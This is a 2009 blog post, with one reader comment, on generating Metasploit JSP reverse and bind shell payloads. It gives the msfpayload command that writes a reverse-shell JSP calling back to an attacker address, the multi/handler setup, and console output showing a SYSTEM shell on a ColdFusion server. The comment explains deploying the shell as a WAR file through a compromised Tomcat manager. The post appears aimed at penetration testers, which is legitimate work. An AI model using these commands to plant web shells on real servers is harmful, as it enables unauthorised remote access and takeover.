Home » Blogs » cg's blog

Metasploit JSP Shells

Thu, 10/22/2009 - 16:08 by cg  

Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb

yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info

Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Wildcard Target

Payload information:
Space: 100000
Avoid: 0 characters


Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.

msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (java/jsp_shell_reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.

Exploit target:

Id Name
-- ----
0 Wildcard Target

msf exploit(handler) > exploit

[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\ColdFusion8\runtime\bin> whoami
whoami
nt authority\system

C:\ColdFusion8\runtime\bin>exit
exit

[*] Command shell session 1 closed.

Trackback URL for this post:

http://carnal0wnage.attackresearch.com/trackback/389
»

Comments

Submitted by Anonymous on Fri, 10/23/2009 - 07:45.

tomcat

If you own the management page of a tomcat server (probably any j2ee server) you could also deploy it as a war file.

jar -cf blah.war blah.jsp